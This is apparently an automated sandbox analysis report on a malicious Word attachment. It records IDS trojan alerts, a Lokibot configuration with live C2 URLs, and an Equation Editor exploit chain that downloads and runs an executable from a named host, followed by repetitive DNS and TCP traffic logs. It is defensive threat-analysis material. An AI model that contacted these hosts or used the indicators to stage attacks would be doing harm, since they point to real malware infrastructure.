                  Timestamp:05/23/24-20:18:55.233506
                  SID:2024313
                  Source Port:49236
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:09.943896
                  SID:2024313
                  Source Port:49252
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:10.679781
                  SID:2021641
                  Source Port:49197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.107766
                  SID:2021641
                  Source Port:49193
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.957362
                  SID:2024318
                  Source Port:49215
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:21.836224
                  SID:2025381
                  Source Port:49205
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.957362
                  SID:2024313
                  Source Port:49215
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:06.064261
                  SID:2825766
                  Source Port:49248
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:11.714251
                  SID:2025381
                  Source Port:49198
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:51.806006
                  SID:2024313
                  Source Port:49179
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:54.073092
                  SID:2825766
                  Source Port:49181
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.005968
                  SID:2825766
                  Source Port:49259
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.049434
                  SID:2021641
                  Source Port:49182
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:22.772748
                  SID:2024313
                  Source Port:49206
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:51.806006
                  SID:2024318
                  Source Port:49179
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.058542
                  SID:2025381
                  Source Port:49177
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:52.694696
                  SID:2021641
                  Source Port:49180
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:31.712532
                  SID:2825766
                  Source Port:49216
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:40.814233
                  SID:2825766
                  Source Port:49168
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:40.275029
                  SID:2825766
                  Source Port:49220
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:57.920775
                  SID:2021641
                  Source Port:49184
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:12.597934
                  SID:2024313
                  Source Port:49255
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:03.316993
                  SID:2024318
                  Source Port:49245
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:28.376454
                  SID:2025381
                  Source Port:49212
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:31.712532
                  SID:2021641
                  Source Port:49216
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.079750
                  SID:2025381
                  Source Port:49201
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:12.597934
                  SID:2024318
                  Source Port:49255
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:59.521470
                  SID:2825766
                  Source Port:49241
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:03.316993
                  SID:2024313
                  Source Port:49245
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.882044
                  SID:2021641
                  Source Port:49260
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:06.064261
                  SID:2021641
                  Source Port:49248
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.888746
                  SID:2825766
                  Source Port:49250
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:48.359257
                  SID:2024313
                  Source Port:49229
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:51.088057
                  SID:2024318
                  Source Port:49232
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.909324
                  SID:2024313
                  Source Port:49238
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:52.425128
                  SID:2825766
                  Source Port:49233
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:16.270962
                  SID:2024318
                  Source Port:49199
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.909324
                  SID:2024318
                  Source Port:49238
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:16.270962
                  SID:2024313
                  Source Port:49199
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:48.359257
                  SID:2024318
                  Source Port:49229
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:59.837093
                  SID:2025381
                  Source Port:49186
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:57.792134
                  SID:2825766
                  Source Port:49239
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:47.441038
                  SID:2825766
                  Source Port:49228
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:51.088057
                  SID:2024313
                  Source Port:49232
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:44.106859
                  SID:2024318
                  Source Port:49171
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:00.736741
                  SID:2021641
                  Source Port:49187
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:29.294238
                  SID:2025381
                  Source Port:49213
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.882044
                  SID:2825766
                  Source Port:49260
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:44.106859
                  SID:2024313
                  Source Port:49171
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:47.441038
                  SID:2021641
                  Source Port:49228
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:53.400223
                  SID:2024313
                  Source Port:49234
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.098368
                  SID:2825766
                  Source Port:49214
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:45.625277
                  SID:2025381
                  Source Port:49226
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:53.400223
                  SID:2024318
                  Source Port:49234
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:49.147570
                  SID:2024313
                  Source Port:49176
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:18.441021
                  SID:2024318
                  Source Port:49262
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:46.332436
                  SID:2024313
                  Source Port:49173
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:46.332436
                  SID:2024318
                  Source Port:49173
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:18.441021
                  SID:2024313
                  Source Port:49262
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:48.088333
                  SID:2021641
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:49.147570
                  SID:2024318
                  Source Port:49176
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.093323
                  SID:2025381
                  Source Port:49237
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:20.882874
                  SID:2825766
                  Source Port:49204
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:04.226888
                  SID:2025381
                  Source Port:49246
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:47.208604
                  SID:2024318
                  Source Port:49174
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:47.208604
                  SID:2024313
                  Source Port:49174
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:38.560340
                  SID:2021641
                  Source Port:49218
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:38.560340
                  SID:2825766
                  Source Port:49218
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:08.863871
                  SID:2025381
                  Source Port:49251
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.888746
                  SID:2021641
                  Source Port:49250
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:20.882874
                  SID:2021641
                  Source Port:49204
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:43.784658
                  SID:2025381
                  Source Port:49224
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:02.368807
                  SID:2024313
                  Source Port:49189
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:42.915752
                  SID:2825766
                  Source Port:49223
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:57.792134
                  SID:2021641
                  Source Port:49239
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:02.368807
                  SID:2024318
                  Source Port:49189
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:48.088333
                  SID:2825766
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                  Source: https://universalmovies.top/sharonzx.exeAvira URL Cloud: Label: phishing
                  Source: http://rocheholding.top/evie3/five/fre.phpAvira URL Cloud: Label: malware
                  Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
                  Source: https://universalmovies.top/sharonzx.exeoC:Avira URL Cloud: Label: phishing
                  Source: https://universalmovies.top/sharonzx.exejAvira URL Cloud: Label: phishing
                  Source: https://universalmovies.top/sharonzx.exemmC:Avira URL Cloud: Label: phishing
                  Source: rocheholding.top/evie3/five/fre.phpAvira URL Cloud: Label: malware
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "rocheholding.top/evie3/five/fre.php"]}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exeReversingLabs: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)ReversingLabs: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeReversingLabs: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeReversingLabs: Detection: 41%
                  Source: SCB REmittance Advice.docReversingLabs: Detection: 42%
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\sharon38892.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
                  Source: Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 4x nop then jmp 046F18B1h5_2_046F1B78
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 4x nop then jmp 01F50FF1h14_2_01F512B4
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficDNS query: name: rocheholding.top
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
